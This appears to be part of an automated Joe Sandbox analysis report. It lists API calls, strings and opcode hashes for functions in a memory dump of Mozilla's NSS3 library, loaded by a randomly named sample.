                                                                                                                                                                                                                              • Part of subcall function 6CC29BF0: TlsGetValue.KERNEL32(?,?,?,6CC70A75), ref: 6CC29C07
                                                                                                                                                                                                                            • SECITEM_ItemsAreEqual_Util.NSS3(?,6CC89030), ref: 6CB67D1B
                                                                                                                                                                                                                              • Part of subcall function 6CBBFD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6CB61A3E,00000048,00000054), ref: 6CBBFD56
                                                                                                                                                                                                                            • SECITEM_ItemsAreEqual_Util.NSS3(?,6CC89048), ref: 6CB67D2F
                                                                                                                                                                                                                            • SECITEM_CopyItem_Util.NSS3(00000000,?,00000000), ref: 6CB67D50
                                                                                                                                                                                                                            • PR_GetCurrentThread.NSS3 ref: 6CB67D61
                                                                                                                                                                                                                            • PORT_ArenaMark_Util.NSS3(?), ref: 6CB67D7D
                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6CB67D9C
                                                                                                                                                                                                                            • CERT_CheckNameSpace.NSS3(?,00000000,00000000), ref: 6CB67DB8
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE023,00000000), ref: 6CB67E19
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Util$CurrentEqual_ErrorItem_ItemsThread$ArenaCheckCompareCopyFindMark_NameSpaceTag_Valuefreememcmp
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 70581797-0
                                                                                                                                                                                                                            • Opcode ID: a4cefb8823d62b62c6626a354f42ab263703ae0d8a32857d99366bdda87a9cd7
                                                                                                                                                                                                                            • Instruction ID: 235212cb935e6efb347fc10e242f18ad1445aeddd85fa0e70bba7fcea6255ba8
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a4cefb8823d62b62c6626a354f42ab263703ae0d8a32857d99366bdda87a9cd7
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7341D6B6A001699BDB008F6ADC41BAF37A4EF5435CF050464EC19B7F50E770E91587E2
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,00000022,?,?,6CBC536F,00000022,?,?,00000000,?), ref: 6CBC4E70
                                                                                                                                                                                                                            • PORT_ZAlloc_Util.NSS3(00000000), ref: 6CBC4F28
                                                                                                                                                                                                                            • PR_smprintf.NSS3(%s=%s,?,00000000), ref: 6CBC4F8E
                                                                                                                                                                                                                            • PR_smprintf.NSS3(%s=%c%s%c,?,?,00000000,?), ref: 6CBC4FAE
                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6CBC4FC8
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_smprintf$Alloc_Utilfreeisspace
                                                                                                                                                                                                                            • String ID: %s=%c%s%c$%s=%s
                                                                                                                                                                                                                            • API String ID: 2709355791-2032576422
                                                                                                                                                                                                                            • Opcode ID: 36f3e40175c22fe167fff2f3d7fce3bdf04b4c39843e0699c6f65f331b87d37f
                                                                                                                                                                                                                            • Instruction ID: c16ca08c5e7f4399a89fda72f243a1b2caebe6c91d38664f536781cb905b0861
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 36f3e40175c22fe167fff2f3d7fce3bdf04b4c39843e0699c6f65f331b87d37f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 66513871B051C78BEF05CAA984907FF7BF5DF46308F1A8125E898A7A41D3358A058FA3
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CB07E27
                                                                                                                                                                                                                            • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CB07E67
                                                                                                                                                                                                                            • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001065F,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000003,?,?), ref: 6CB07EED
                                                                                                                                                                                                                            • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001066C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CB07F2E
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _byteswap_ulongsqlite3_log
                                                                                                                                                                                                                            • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                            • API String ID: 912837312-598938438
                                                                                                                                                                                                                            • Opcode ID: 86c6cbccf71c8f051d58b5d8f26b6b8bcd9d654fbce7c77245bf7b26e416aa46
                                                                                                                                                                                                                            • Instruction ID: a7f029e1b5f7ae89be380eb9fff31faf094e615eb98012665039f9d30f62704f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 86c6cbccf71c8f051d58b5d8f26b6b8bcd9d654fbce7c77245bf7b26e416aa46
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F361D270B012859FCB05CF64C890BAABBB6FF45308F1445A8EC096BB52D770EC56CBA1
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000124AC,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CAEFD7A
                                                                                                                                                                                                                            • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CAEFD94
                                                                                                                                                                                                                            • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000124BF,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CAEFE3C
                                                                                                                                                                                                                            • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CAEFE83
                                                                                                                                                                                                                              • Part of subcall function 6CAEFEC0: memcmp.VCRUNTIME140(?,?,?,?,00000000,?), ref: 6CAEFEFA
                                                                                                                                                                                                                              • Part of subcall function 6CAEFEC0: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00000000,?), ref: 6CAEFF3B
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _byteswap_ulongsqlite3_log$memcmpmemcpy
                                                                                                                                                                                                                            • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                            • API String ID: 1169254434-598938438
                                                                                                                                                                                                                            • Opcode ID: da4a2755096a8cc97ddcb166bfd6ec9c3953693ec8b29275f3c9f61ed8798900
                                                                                                                                                                                                                            • Instruction ID: 14c88aecbc676d929b5ca844aa855290a1df48e94acc749e26d317f808112f1b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: da4a2755096a8cc97ddcb166bfd6ec9c3953693ec8b29275f3c9f61ed8798900
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7E514071A002059FDB04CFA9D8D0AAEBBB1EF4C308F14406DE905AB756E735ED95DBA0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(00000000,00000000,?,6CB8124D,00000001), ref: 6CB78D19
                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,6CB8124D,00000001), ref: 6CB78D32
                                                                                                                                                                                                                            • PL_ArenaRelease.NSS3(?,?,?,?,?,6CB8124D,00000001), ref: 6CB78D73
                                                                                                                                                                                                                            • PR_Unlock.NSS3(?,?,?,?,?,6CB8124D,00000001), ref: 6CB78D8C
                                                                                                                                                                                                                              • Part of subcall function 6CC0DD70: TlsGetValue.KERNEL32 ref: 6CC0DD8C
                                                                                                                                                                                                                              • Part of subcall function 6CC0DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CC0DDB4
                                                                                                                                                                                                                            • PR_Unlock.NSS3(?,?,?,?,?,6CB8124D,00000001), ref: 6CB78DBA
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
                                                                                                                                                                                                                            • String ID: KRAM$KRAM
                                                                                                                                                                                                                            • API String ID: 2419422920-169145855
                                                                                                                                                                                                                            • Opcode ID: ee62025cfb6097e9d7290dd0e99f2dda20325b652edf361e8f1bc986d9ca0e0f
                                                                                                                                                                                                                            • Instruction ID: 59069c0fc9584cc54fa95d7cd028953242bc9c08006014fbc30c86c3a5fb6608
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ee62025cfb6097e9d7290dd0e99f2dda20325b652edf361e8f1bc986d9ca0e0f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B0217CB1A046518FCB10EF78C58455ABBF0FF45318F15896EDCA897701E731E841CBA2
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PR_LogPrint.NSS3(C_MessageDecryptFinal), ref: 6CB9ACE6
                                                                                                                                                                                                                            • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CB9AD14
                                                                                                                                                                                                                            • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CB9AD23
                                                                                                                                                                                                                              • Part of subcall function 6CC7D930: PL_strncpyz.NSS3(?,?,?), ref: 6CC7D963
                                                                                                                                                                                                                            • PR_LogPrint.NSS3(?,00000000), ref: 6CB9AD39
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: L_strncpyzPrint$L_strcatn
                                                                                                                                                                                                                            • String ID: hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageDecryptFinal
                                                                                                                                                                                                                            • API String ID: 332880674-3521875567
                                                                                                                                                                                                                            • Opcode ID: 718631b9e0d0b8385f1aba40aa53ead0c992fc6079ad3bfacd096142b9f79bed
                                                                                                                                                                                                                            • Instruction ID: 62ddb74bc30a1f79b07ee11b3821af3af5567c20577a08383defc27df53cc4ee
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 718631b9e0d0b8385f1aba40aa53ead0c992fc6079ad3bfacd096142b9f79bed
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B9212670A011A49FDB109B64DC98BAF37B5EF4331EF054035E40A97A61EB309E49CBA2
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CC34DC3
                                                                                                                                                                                                                            • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CA4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CC34DE0
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            • API call with %s database connection pointer, xrefs: 6CC34DBD
                                                                                                                                                                                                                            • invalid, xrefs: 6CC34DB8
                                                                                                                                                                                                                            • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CC34DCB
                                                                                                                                                                                                                            • misuse, xrefs: 6CC34DD5
                                                                                                                                                                                                                            • %s at line %d of [%.10s], xrefs: 6CC34DDA
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: sqlite3_log
                                                                                                                                                                                                                            • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
                                                                                                                                                                                                                            • API String ID: 632333372-2974027950
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CC34E30
                                                                                                                                                                                                                            • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CAD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CC34E4D
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            • API call with %s database connection pointer, xrefs: 6CC34E2A
                                                                                                                                                                                                                            • invalid, xrefs: 6CC34E25
                                                                                                                                                                                                                            • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CC34E38
                                                                                                                                                                                                                            • misuse, xrefs: 6CC34E42
                                                                                                                                                                                                                            • %s at line %d of [%.10s], xrefs: 6CC34E47
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: sqlite3_log
                                                                                                                                                                                                                            • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
                                                                                                                                                                                                                            • API String ID: 632333372-2974027950
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PR_SetError.NSS3(00000000,00000000,6CBA1444,?,00000001,?,00000000,00000000,?,?,6CBA1444,?,?,00000000,?,?), ref: 6CBA0CB3
                                                                                                                                                                                                                              • Part of subcall function 6CC0C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CC0C2BF
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6CBA1444,?,00000001,?,00000000,00000000,?,?,6CBA1444,?), ref: 6CBA0DC1
                                                                                                                                                                                                                            • PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6CBA1444,?,00000001,?,00000000,00000000,?,?,6CBA1444,?), ref: 6CBA0DEC
                                                                                                                                                                                                                              • Part of subcall function 6CBC0F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6CB62AF5,?,?,?,?,?,6CB60A1B,00000000), ref: 6CBC0F1A
                                                                                                                                                                                                                              • Part of subcall function 6CBC0F10: malloc.MOZGLUE(00000001), ref: 6CBC0F30
                                                                                                                                                                                                                              • Part of subcall function 6CBC0F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6CBC0F42
                                                                                                                                                                                                                            • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6CBA1444,?,00000001,?,00000000,00000000,?), ref: 6CBA0DFF
                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6CBA1444,?,00000001,?,00000000), ref: 6CBA0E16
                                                                                                                                                                                                                            • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6CBA1444,?,00000001,?,00000000,00000000,?), ref: 6CBA0E53
                                                                                                                                                                                                                            • PR_GetCurrentThread.NSS3(?,?,?,?,6CBA1444,?,00000001,?,00000000,00000000,?,?,6CBA1444,?,?,00000000), ref: 6CBA0E65
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6CBA1444,?,00000001,?,00000000,00000000,?), ref: 6CBA0E79
                                                                                                                                                                                                                              • Part of subcall function 6CBB1560: TlsGetValue.KERNEL32(00000000,?,6CB80844,?), ref: 6CBB157A
                                                                                                                                                                                                                              • Part of subcall function 6CBB1560: EnterCriticalSection.KERNEL32(?,?,?,6CB80844,?), ref: 6CBB158F
                                                                                                                                                                                                                              • Part of subcall function 6CBB1560: PR_Unlock.NSS3(?,?,?,?,6CB80844,?), ref: 6CBB15B2
                                                                                                                                                                                                                              • Part of subcall function 6CB7B1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6CB81397,00000000,?,6CB7CF93,5B5F5EC0,00000000,?,6CB81397,?), ref: 6CB7B1CB
                                                                                                                                                                                                                              • Part of subcall function 6CB7B1A0: free.MOZGLUE(5B5F5EC0,?,6CB7CF93,5B5F5EC0,00000000,?,6CB81397,?), ref: 6CB7B1D2
                                                                                                                                                                                                                              • Part of subcall function 6CB789E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6CB788AE,-00000008), ref: 6CB78A04
                                                                                                                                                                                                                              • Part of subcall function 6CB789E0: EnterCriticalSection.KERNEL32(?), ref: 6CB78A15
                                                                                                                                                                                                                              • Part of subcall function 6CB789E0: memset.VCRUNTIME140(6CB788AE,00000000,00000132), ref: 6CB78A27
                                                                                                                                                                                                                              • Part of subcall function 6CB789E0: PR_Unlock.NSS3(?), ref: 6CB78A35
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1601681851-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 6CB78850: calloc.MOZGLUE(00000001,00000028,00000000,?,?,6CB80715), ref: 6CB78859
                                                                                                                                                                                                                              • Part of subcall function 6CB78850: PR_NewLock.NSS3 ref: 6CB78874
                                                                                                                                                                                                                              • Part of subcall function 6CB78850: PL_InitArenaPool.NSS3(-00000008,NSS,00000800,00000008), ref: 6CB7888D
                                                                                                                                                                                                                            • PR_NewLock.NSS3 ref: 6CB79CAD
                                                                                                                                                                                                                              • Part of subcall function 6CC298D0: calloc.MOZGLUE(00000001,00000084,6CB50936,00000001,?,6CB5102C), ref: 6CC298E5
                                                                                                                                                                                                                              • Part of subcall function 6CB507A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CAE204A), ref: 6CB507AD
                                                                                                                                                                                                                              • Part of subcall function 6CB507A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CAE204A), ref: 6CB507CD
                                                                                                                                                                                                                              • Part of subcall function 6CB507A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CAE204A), ref: 6CB507D6
                                                                                                                                                                                                                              • Part of subcall function 6CB507A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CAE204A), ref: 6CB507E4
                                                                                                                                                                                                                              • Part of subcall function 6CB507A0: TlsSetValue.KERNEL32(00000000,?,6CAE204A), ref: 6CB50864
                                                                                                                                                                                                                              • Part of subcall function 6CB507A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CB50880
                                                                                                                                                                                                                              • Part of subcall function 6CB507A0: TlsSetValue.KERNEL32(00000000,?,?,6CAE204A), ref: 6CB508CB
                                                                                                                                                                                                                              • Part of subcall function 6CB507A0: TlsGetValue.KERNEL32(?,?,6CAE204A), ref: 6CB508D7
                                                                                                                                                                                                                              • Part of subcall function 6CB507A0: TlsGetValue.KERNEL32(?,?,6CAE204A), ref: 6CB508FB
                                                                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6CB79CE8
                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,6CB7ECEC,6CB82FCD,00000000,?,6CB82FCD,?), ref: 6CB79D01
                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(?,?,?,6CB7ECEC,6CB82FCD,00000000,?,6CB82FCD,?), ref: 6CB79D38
                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,6CB7ECEC,6CB82FCD,00000000,?,6CB82FCD,?), ref: 6CB79D4D
                                                                                                                                                                                                                            • PR_Unlock.NSS3 ref: 6CB79D70
                                                                                                                                                                                                                            • PR_Unlock.NSS3 ref: 6CB79DC3
                                                                                                                                                                                                                            • PR_NewLock.NSS3 ref: 6CB79DDD
                                                                                                                                                                                                                              • Part of subcall function 6CB788D0: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6CB80725,00000000,00000058), ref: 6CB78906
                                                                                                                                                                                                                              • Part of subcall function 6CB788D0: EnterCriticalSection.KERNEL32(?), ref: 6CB7891A
                                                                                                                                                                                                                              • Part of subcall function 6CB788D0: PL_ArenaAllocate.NSS3(?,?), ref: 6CB7894A
                                                                                                                                                                                                                              • Part of subcall function 6CB788D0: calloc.MOZGLUE(00000001,6CB8072D,00000000,00000000,00000000,?,6CB80725,00000000,00000058), ref: 6CB78959
                                                                                                                                                                                                                              • Part of subcall function 6CB788D0: memset.VCRUNTIME140(?,00000000,?), ref: 6CB78993
                                                                                                                                                                                                                              • Part of subcall function 6CB788D0: PR_Unlock.NSS3(?), ref: 6CB789AF
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Value$calloc$CriticalEnterLockSectionUnlock$Arena$AllocateInitPoolmemset
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3394263606-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PR_Now.NSS3 ref: 6CB6DCFA
                                                                                                                                                                                                                              • Part of subcall function 6CC29DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CC70A27), ref: 6CC29DC6
                                                                                                                                                                                                                              • Part of subcall function 6CC29DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CC70A27), ref: 6CC29DD1
                                                                                                                                                                                                                              • Part of subcall function 6CC29DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CC29DED
                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6CB6DD40
                                                                                                                                                                                                                            • CERT_FindCertIssuer.NSS3(?,?,?,?), ref: 6CB6DD62
                                                                                                                                                                                                                            • CERT_DestroyCertificate.NSS3(?), ref: 6CB6DD71
                                                                                                                                                                                                                            • CERT_DestroyCertificate.NSS3(00000000), ref: 6CB6DD81
                                                                                                                                                                                                                            • CERT_RemoveCertListNode.NSS3(?), ref: 6CB6DD8F
                                                                                                                                                                                                                              • Part of subcall function 6CB806A0: TlsGetValue.KERNEL32 ref: 6CB806C2
                                                                                                                                                                                                                              • Part of subcall function 6CB806A0: EnterCriticalSection.KERNEL32(?), ref: 6CB806D6
                                                                                                                                                                                                                              • Part of subcall function 6CB806A0: PR_Unlock.NSS3 ref: 6CB806EB
                                                                                                                                                                                                                            • CERT_DestroyCertificate.NSS3(?), ref: 6CB6DD9E
                                                                                                                                                                                                                            • CERT_DestroyCertificate.NSS3(?), ref: 6CB6DDB7
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CertificateDestroy$Time$CertSystem$CriticalEnterFileFindIssuerListNodeRemoveSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strcmp
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 653623313-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(?,?,?,?,6CBD460B,?,?), ref: 6CB63CA9
                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CB63CB9
                                                                                                                                                                                                                            • PL_HashTableLookup.NSS3(?), ref: 6CB63CC9
                                                                                                                                                                                                                            • SECITEM_DupItem_Util.NSS3(00000000), ref: 6CB63CD6
                                                                                                                                                                                                                            • PR_Unlock.NSS3 ref: 6CB63CE6
